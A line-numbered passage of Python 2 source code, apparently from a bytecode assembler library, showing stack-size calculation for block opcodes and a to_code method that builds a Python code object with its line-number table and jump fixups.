591 |                 yield label_pos[arg], newstack(3)
592 |                 yield pos+1, curstack + (0,)
593 | 
594 |             elif op == SETUP_FINALLY:
595 |                 # We continue with a new block.
596 |                 # On exception, we jump to the label with 3 extra objects on
597 |                 # stack, but to keep stack recording consistent, we behave as
598 |                 # if we add only 1 object. Extra 2 will be added to the actual
599 |                 # recording.
600 |                 yield label_pos[arg], newstack(1)
601 |                 yield pos+1, curstack + (0,)
602 | 
603 |             elif python_version == '2.7' and op == SETUP_WITH:
604 |                 yield label_pos[arg], curstack
605 |                 yield pos+1, newstack(-1) + (1,)
606 | 
607 |             elif op == POP_BLOCK:
608 |                 # Just pop the block
609 |                 yield pos+1, curstack[:-1]
610 | 
611 |             elif op == END_FINALLY:
612 |                 # Since stack recording of SETUP_FINALLY targets is of 3 pushed
613 |                 # objects (as when an exception is raised), we pop 3 objects.
614 |                 yield pos+1, newstack(-3)
615 | 
616 |             elif op == WITH_CLEANUP:
617 |                 # Since WITH_CLEANUP is always found after SETUP_FINALLY
618 |                 # targets, and the stack recording is that of a raised
619 |                 # exception, we can simply pop 1 object and let END_FINALLY
620 |                 # pop the remaining 3.
621 |                 if python_version == '2.7':
622 |                   yield pos+1, newstack(2)
623 |                 else:
624 |                   yield pos+1, newstack(-1)
625 | 
626 |             else:
627 |                 assert False, "Unhandled opcode: %r" % op
628 | 
629 | 
630 |         # Now comes the calculation: open_positions holds positions which are
631 |         # yet to be explored. In each step we take one open position, and
632 |         # explore it by adding the positions to which you can get from it, to
633 |         # open_positions. On the way, we update maxsize.
634 |         # open_positions is a list of tuples: (pos, stack state)
635 |         maxsize = 0
636 |         open_positions = [(0, (0,))]
637 |         while open_positions:
638 |             pos, curstack = open_positions.pop()
639 |             maxsize = max(maxsize, sum(curstack))
640 |             open_positions.extend(get_next_stacks(pos, curstack))
641 | 
642 |         return maxsize
643 | 
644 |     def to_code(self):
645 |         """Assemble a Python code object from a Code object."""
646 |         co_argcount = len(self.args) - self.varargs - self.varkwargs
647 |         co_stacksize = self._compute_stacksize()
648 |         co_flags = self._compute_flags()
649 | 
650 |         co_consts = [self.docstring]
651 |         co_names = []
652 |         co_varnames = list(self.args)
653 | 
654 |         co_freevars = tuple(self.freevars)
655 | 
656 |         # We find all cellvars beforehand, for two reasons:
657 |         # 1. We need the number of them to construct the numeric argument
658 |         #    for ops in "hasfree".
659 |         # 2. We need to put arguments which are cell vars in the beginning
660 |         #    of co_cellvars
661 |         cellvars = set(arg for op, arg in self.code
662 |                        if isopcode(op) and op in hasfree
663 |                        and arg not in co_freevars)
664 |         co_cellvars = [x for x in self.args if x in cellvars]
665 | 
666 |         def index(seq, item, eq=operator.eq, can_append=True):
667 |             """Find the index of item in a sequence and return it.
668 |             If it is not found in the sequence, and can_append is True,
669 |             it is appended to the sequence.
670 | 
671 |             eq is the equality operator to use.
672 |             """
673 |             for i, x in enumerate(seq):
674 |                 if eq(x, item):
675 |                     return i
676 |             else:
677 |                 if can_append:
678 |                     seq.append(item)
679 |                     return len(seq) - 1
680 |                 else:
681 |                     raise IndexError, "Item not found"
682 | 
683 |         # List of tuples (pos, label) to be filled later
684 |         jumps = []
685 |         # A mapping from a label to its position
686 |         label_pos = {}
687 |         # Last SetLineno
688 |         lastlineno = self.firstlineno
689 |         lastlinepos = 0
690 | 
691 |         co_code = array('B')
692 |         co_lnotab = array('B')
693 |         for i, (op, arg) in enumerate(self.code):
694 |             if isinstance(op, Label):
695 |                 label_pos[op] = len(co_code)
696 | 
697 |             elif op is SetLineno:
698 |                 incr_lineno = arg - lastlineno
699 |                 incr_pos = len(co_code) - lastlinepos
700 |                 lastlineno = arg
701 |                 lastlinepos = len(co_code)
702 | 
703 |                 if incr_lineno == 0 and incr_pos == 0:
704 |                     co_lnotab.append(0)
705 |                     co_lnotab.append(0)
706 |                 else:
707 |                     while incr_pos > 255:
708 |                         co_lnotab.append(255)
709 |                         co_lnotab.append(0)
710 |                         incr_pos -= 255
711 |                     while incr_lineno > 255:
712 |                         co_lnotab.append(incr_pos)
713 |                         co_lnotab.append(255)
714 |                         incr_pos = 0
715 |                         incr_lineno -= 255
716 |                     if incr_pos or incr_lineno:
717 |                         co_lnotab.append(incr_pos)
718 |                         co_lnotab.append(incr_lineno)
719 | 
720 |             elif op == opcode.EXTENDED_ARG:
721 |                 raise ValueError, "EXTENDED_ARG not supported in Code objects"
722 | 
723 |             elif not op in hasarg:
724 |                 co_code.append(op)
725 | 
726 |             else:
727 |                 if op in hasconst:
728 |                     if isinstance(arg, Code) and i < len(self.code)-1 and \
729 |                        self.code[i+1][0] in hascode:
730 |                         arg = arg.to_code()
731 |                     arg = index(co_consts, arg, operator.is_)
732 |                 elif op in hasname:
733 |                     arg = index(co_names, arg)
734 |                 elif op in hasjump:
735 |                     # arg will be filled later
736 |                     jumps.append((len(co_code), arg))
737 |                     arg = 0
738 |                 elif op in haslocal:
739 |                     arg = index(co_varnames, arg)
740 |                 elif op in hascompare:
741 |                     arg = index(cmp_op, arg, can_append=False)
742 |                 elif op in hasfree:
743 |                     try:
744 |                         arg = index(co_freevars, arg, can_append=False) \
745 |                               + len(cellvars)
746 |                     except IndexError:
747 |                         arg = index(co_cellvars, arg)
748 |                 else:
749 |                     # arg is ok
750 |                     pass
751 | 
752 |                 if arg > 0xFFFF:
753 |                     co_code.append(opcode.EXTENDED_ARG)
754 |                     co_code.append((arg >> 16) & 0xFF)
755 |                     co_code.append((arg >> 24) & 0xFF)
756 |                 co_code.append(op)
757 |                 co_code.append(arg & 0xFF)
758 |                 co_code.append((arg >> 8) & 0xFF)
759 | 
760 |         for pos, label in jumps:
761 |             jump = label_pos[label]
762 |             if co_code[pos] in hasjrel:
763 |                 jump -= pos+3
764 |             if jump > 0xFFFF:
765 |                 raise NotImplementedError, "Extended jumps not implemented"
766 |             co_code[pos+1] = jump & 0xFF
767 |             co_code[pos+2] = (jump >> 8) & 0xFF
768 | 
769 |         co_code = co_code.tostring()
770 |         co_lnotab = co_lnotab.tostring()
771 | 
772 |         co_consts = tuple(co_consts)
773 |         co_names = tuple(co_names)
774 |         co_varnames = tuple(co_varnames)
775 |         co_nlocals = len(co_varnames)
776 |         co_cellvars = tuple(co_cellvars)
777 | 
778 |         return types.CodeType(co_argcount, co_nlocals, co_stacksize, co_flags,
779 |                               co_code, co_consts, co_names, co_varnames,
780 |                               self.filename, self.name, self.firstlineno, co_lnotab,
781 |                               co_freevars, co_cellvars)
782 | 


--------------------------------------------------------------------------------